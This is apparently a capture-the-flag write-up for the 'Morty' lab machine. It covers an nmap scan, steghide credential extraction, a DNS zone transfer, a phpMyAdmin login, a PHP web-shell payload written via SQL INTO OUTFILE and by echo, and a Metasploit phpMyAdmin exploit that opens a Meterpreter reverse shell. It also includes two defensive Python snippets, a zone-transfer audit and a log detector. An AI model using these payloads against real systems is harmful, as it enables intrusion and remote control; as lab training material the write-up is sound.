ptd-morty-private


┌─[✗]─[user@parrot-virtual]─[~/ptd/morty]
└──╼ $cat allports.nmap 
# Nmap 7.91 scan initiated Fri Mar 5 15:11:41 2021 as: nmap -A -oN allports.nmap 10.150.150.57
Nmap scan report for mortysserver.com (10.150.150.57)
Host is up (0.031s latency).
Not shown: 997 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
| 3072 e8:60:09:66:aa:1f:e8:76:d8:84:16:18:1c:e4:ee:32 (RSA)
| 256 92:09:d3:0e:f9:47:48:03:9f:32:9f:0f:17:87:c2:a4 (ECDSA)
|_ 256 1d:d1:b3:2b:24:dc:c2:8a:d7:ca:44:39:24:c3:af:3d (ED25519)
53/tcp open domain ISC BIND 9.16.1 (Ubuntu Linux)
| dns-nsid: 
|_ bind.version: 9.16.1-Ubuntu
80/tcp open http Apache httpd 2.4.41
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
Service Info: Host: 127.0.1.1; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Fri Mar 5 15:11:58 2021 -- 1 IP address (1 host up) scanned in 16.41 seconds
┌─[user@parrot-virtual]─[~/ptd/morty]


┌─[user@parrot-virtual]─[~/ptd/morty]
└──╼ $curl http://10.150.150.57/note.html
Morty, <br>
if you read this: I've already configured your domain 'mortysserver.com' on this server, don't bother me with it anymore!!
<br>
-Rick 
┌─[user@parrot-virtual]─[~/ptd/morty]

Add 10.150.150.57 mortysserver.com to /etc/hosts.

┌─[user@parrot-virtual]─[~/ptd/morty]
└──╼ $cat secret.txt 
Fl4sk#!
┌─[user@parrot-virtual]─[~/ptd/morty]
└──╼ $md5sum screen.jpeg
df7eb9983c329c32408c5a6be270b3f1  screen.jpeg
┌─[user@parrot-virtual]─[~/ptd/morty]
└──╼ $steghide --info screen.jpeg
"screen.jpeg":
format: jpeg
capacity: 10.4 KB
Try to get information about embedded data ? (y/n) y
Enter passphrase: 
embedded file "keytotheuniverse.txt":
size: 24.0 Byte
encrypted: rijndael-128, cbc
compressed: yes
┌─[user@parrot-virtual]─[~/ptd/morty]
└──╼ $steghide extract -sf screen.jpeg 
Enter passphrase: Fl4sk#!
wrote extracted data to "keytotheuniverse.txt".
┌─[user@parrot-virtual]─[~/ptd/morty]
└──╼ $ls -la
total 212
drwxr-xr-x 1 user user 108 Mar 11 11:12 .
drwxr-xr-x 1 user user 2164 Mar 5 15:10 ..
-rw-r--r-- 1 user user 1016 Mar 5 15:11 allports.nmap
-rw-r--r-- 1 user user 24 Mar 11 11:12 keytotheuniverse.txt
-rw-r--r-- 1 user user 204432 Mar 8 09:32 screen.jpeg
-rw-r--r-- 1 user user 9 Mar 11 11:11 secret.txt
┌─[user@parrot-virtual]─[~/ptd/morty]
└──╼ $cat keytotheuniverse.txt 
rick:WubbaLubbaDubDub1!



┌─[user@parrot-virtual]─[~/ptd/morty]
└──╼ $dig axfr @10.150.150.57

; <<>> DiG 9.16.8-Debian <<>> axfr @10.150.150.57
; (1 server found)
;; global options: +cmd
;; Query time: 33 msec
;; SERVER: 10.150.150.57#53(10.150.150.57)
;; WHEN: Fri Mar 12 11:46:00 GMT 2021
;; MSG SIZE rcvd: 56

┌─[user@parrot-virtual]─[~/ptd/morty]
└──╼ $dig axfr @10.150.150.57 mortysserver.com

; <<>> DiG 9.16.8-Debian <<>> axfr @10.150.150.57 mortysserver.com
; (1 server found)
;; global options: +cmd
mortysserver.com. 900 IN SOA 10.150.150.57. email.mortysserver.com. 1 900 900 604800 900
mortysserver.com. 900 IN NS 10.150.150.57.
rickscontrolpanel.mortysserver.com. 900 IN A 10.150.150.57
mortysserver.com. 900 IN SOA 10.150.150.57. email.mortysserver.com. 1 900 900 604800 900
;; Query time: 29 msec
;; SERVER: 10.150.150.57#53(10.150.150.57)
;; WHEN: Fri Mar 12 11:47:13 GMT 2021
;; XFR size: 4 records (messages 1, bytes 212)

┌─[user@parrot-virtual]─[~/ptd/morty]

We add to /etc/hosts: 10.150.150.57 mortysserver.com rickscontrolpanel.mortysserver.com email.mortysserver.com
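The zone transfer above handed out the whole zone because BIND 9.16 serves AXFR to any client unless allow-transfer restricts it. As an added example, not from the original writeup, this Python audit parses a constructed named.conf fragment and lists the served zones that are still open; the zone names and the 10.150.150.58 secondary address are samples.

```python
import re

# Constructed named.conf fragment (not the lab host's); zone names are samples.
SAMPLE_NAMED_CONF = """
options { directory "/var/cache/bind"; };
zone "internal.example" { type master; allow-transfer { 10.150.150.58; }; };
zone "mortysserver.com" { type master; };
zone "open.example" { type master; allow-transfer { any; }; };
zone "example.net" { type slave; masters { 10.0.0.1; }; };
"""

XFER_RE = re.compile(r"allow-transfer\s*\{([^}]*)\}")


def _blocks(conf, head_re):
    """Yield (match, body) for each block opened by head_re, matching braces
    so nested ACL blocks such as allow-transfer { ... }; stay in the body."""
    for m in re.finditer(head_re, conf):
        depth, i = 1, m.end()
        while i < len(conf) and depth:
            depth += {"{": 1, "}": -1}.get(conf[i], 0)
            i += 1
        yield m, conf[m.end():i - 1]


def open_transfer_zones(conf, default_allow="any"):
    """Names of served zones whose AXFR is open to any client.

    BIND releases before 9.19 transfer to anyone unless allow-transfer is set
    (default_allow models that); an options-level allow-transfer overrides it.
    Zones that are only fetched (slave/secondary, hint, forward) are skipped."""
    for _, body in _blocks(conf, r"\boptions\s*\{"):
        m = XFER_RE.search(body)
        if m:
            default_allow = m.group(1)
    exposed = []
    for head, body in _blocks(conf, r'zone\s+"([^"]+)"\s*\{'):
        if re.search(r"\btype\s+(slave|secondary|hint|forward)\s*;", body):
            continue
        m = XFER_RE.search(body)
        acl = m.group(1) if m else default_allow
        if "any" in [t.strip() for t in acl.split(";") if t.strip()]:
            exposed.append(head.group(1))
    return exposed
```

Running it against the sample reports mortysserver.com and open.example; adding `allow-transfer { none; };` to options (or to each zone) clears the list.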


We access http://rickscontrolpanel.mortysserver.com

and find FLAG1=921e4db975bda77543cfe83fbe176d15e09ce7e2

We log on to this phpMyAdmin site as rick:WubbaLubbaDubDub1!

and find

FLAG2=e39c995fbf614c5c38ca7343f59cc310e5880251


In phpMyAdmin, create a database first, then execute the query:

 SELECT "<?php system($_GET['cmd']); ?>" into outfile "/var/www/html/backdoor.php"


We get:

Error

SQL query:

SELECT "<?php system($_GET['cmd']); ?>" into outfile "/var/www/backdoor.php"

MySQL said:
#1 - Can't create/write to file '/var/www/backdoor.php' (Errcode: 13 "Permission denied")

So we can't write there (writing to /tmp is allowed).


SELECT LOAD_FILE('/etc/passwd');

root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-network:x:100:102:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
systemd-timesync:x:102:104:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
messagebus:x:103:106::/nonexistent:/usr/sbin/nologin
syslog:x:104:110::/home/syslog:/usr/sbin/nologin
apt:x:105:65534::/nonexistent:/usr/sbin/nologin
tss:x:106:111:TPM software stack,,,:/var/lib/tpm:/bin/false
uuidd:x:107:112::/run/uuidd:/usr/sbin/nologin
tcpdump:x:108:113::/nonexistent:/usr/sbin/nologin
landscape:x:109:115::/var/lib/landscape:/usr/sbin/nologin
pollinate:x:110:1::/var/cache/pollinate:/bin/false
sshd:x:111:65534::/run/sshd:/usr/sbin/nologin
systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin
morty:x:1000:1000:Morty Smith:/home/morty:/bin/bash
lxd:x:998:100::/var/snap/lxd/common/lxd:/bin/false
bind:x:112:118::/var/cache/bind:/usr/sbin/nologin
mysql:x:113:119:MySQL Server,,,:/nonexistent:/bin/false

Wappalyzer shows phpMyAdmin version 4.8.1.

We can then use https://medium.com/@happyholic1203/phpmyadmin-4-8-0-4-8-1-remote-code-execution-257bcc146f8e#:~:text=from%20PMA%204.8.-,0%20~%204.8.,PHP%20code%20on%20the%20server

or use the Metasploit module multi/http/phpmyadmin_lfi_rce:

msf6 exploit(multi/http/phpmyadmin_lfi_rce) > show options

Module options (exploit/multi/http/phpmyadmin_lfi_rce):

Name Current Setting Required Description
---- --------------- -------- -----------
PASSWORD WubbaLubbaDubDub1! no Password to authenticate with
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS 10.150.150.57 yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT 80 yes The target port (TCP)
SSL false no Negotiate SSL/TLS for outgoing connections
TARGETURI / yes Base phpMyAdmin directory path
USERNAME rick yes Username to authenticate with
VHOST rickscontrolpanel.mortysserver.com no HTTP server virtual host


Payload options (php/meterpreter/reverse_tcp):

Name Current Setting Required Description
---- --------------- -------- -----------
LHOST 10.66.66.42 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port


Exploit target:

Id Name
-- ----
0 Automatic
msf6 exploit(multi/http/phpmyadmin_lfi_rce) > exploit -j
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.

[*] Started reverse TCP handler on 10.66.66.42:4444 
msf6 exploit(multi/http/phpmyadmin_lfi_rce) > [*] Sending stage (39282 bytes) to 10.150.150.57
[*] Meterpreter session 1 opened (10.66.66.42:4444 -> 10.150.150.57:42974) at 2021-03-13 14:58:15 +0000

msf6 exploit(multi/http/phpmyadmin_lfi_rce) > sessions -l

Active sessions
===============

  Id  Name  Type                   Information            Connection
  --  ----  ----                   -----------            ----------
  1         meterpreter php/linux  www-data (33) @ morty  10.66.66.42:4444 -> 10.150.150.57:42974 (10.150.150.57)

msf6 exploit(multi/http/phpmyadmin_lfi_rce) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > shell
Process 9802 created.
Channel 0 created.


cd user/morty

cat FLAG3.txt
73ce6cecfc1109f1e43d379fd9922dcc699af321

Later I found that I could write to:

echo '<?php system($_GET["cmd"]); ?>' > shell.php
pwd
/var/www/html/rickscontrolpanel/public_html/phpmyadmin

and then access

http://rickscontrolpanel.mortysserver.com/shell.php?cmd=whoami
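From the defender's side, both the phpMyAdmin file inclusion used above and the shell.php?cmd= web shell leave distinctive traces in the Apache access log. The following Python detector is added here and is not part of the original writeup; it classifies constructed log lines, decoding query values twice so that double-URL-encoded traversal is still caught, and flags any .php request that carries a cmd parameter. The log lines, client addresses and session path are samples.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Constructed Apache combined-log lines, not captured from the lab host.
SAMPLE_LOG = """\
10.66.66.42 - - [13/Mar/2021:14:58:10 +0000] "GET /phpmyadmin/index.php?db=test&target=db_sql.php%253f/../../../../../../etc/passwd HTTP/1.1" 200 512 "-" "Mozilla/5.0"
10.66.66.42 - - [13/Mar/2021:15:02:01 +0000] "GET /shell.php?cmd=whoami HTTP/1.1" 200 9 "-" "curl/7.74.0"
10.150.150.20 - - [13/Mar/2021:15:03:44 +0000] "GET /phpmyadmin/index.php?db=test&target=db_structure.php HTTP/1.1" 200 4096 "-" "Mozilla/5.0"
10.150.150.21 - - [13/Mar/2021:15:04:10 +0000] "GET /note.html HTTP/1.1" 200 120 "-" "curl/7.74.0"
"""

# Common/combined log format: client, ident, user, [timestamp], "METHOD URL PROTO", status
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<url>\S+) [^"]*" (?P<status>\d{3})'
)


def decode_twice(value):
    """Undo up to two layers of URL encoding so that double-encoded traversal
    (e.g. %252e%252e%252f, or %253f placed before ../) is compared in plain form."""
    return unquote(unquote(value))


def classify(line):
    """Return the list of indicators found in one access-log line ([] if benign)."""
    m = LOG_RE.match(line)
    if not m:
        return []
    url = urlsplit(m["url"])
    params = parse_qs(url.query, keep_blank_values=True)
    findings = []
    if url.path.endswith(".php") and "cmd" in params:
        findings.append("webshell-command")  # e.g. shell.php?cmd=whoami
    if any("../" in decode_twice(v) for vs in params.values() for v in vs):
        findings.append("path-traversal")  # e.g. target=...%253f/../../
    return findings


def suspicious_requests(log_text):
    """(client ip, url, indicators) for every line carrying at least one indicator."""
    hits = []
    for line in log_text.splitlines():
        findings = classify(line)
        if findings:
            m = LOG_RE.match(line)
            hits.append((m["ip"], m["url"], findings))
    return hits
```

On the sample, the two requests from 10.66.66.42 are flagged and the ordinary phpMyAdmin and note.html requests are not.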

 

Author : Puckiestyle
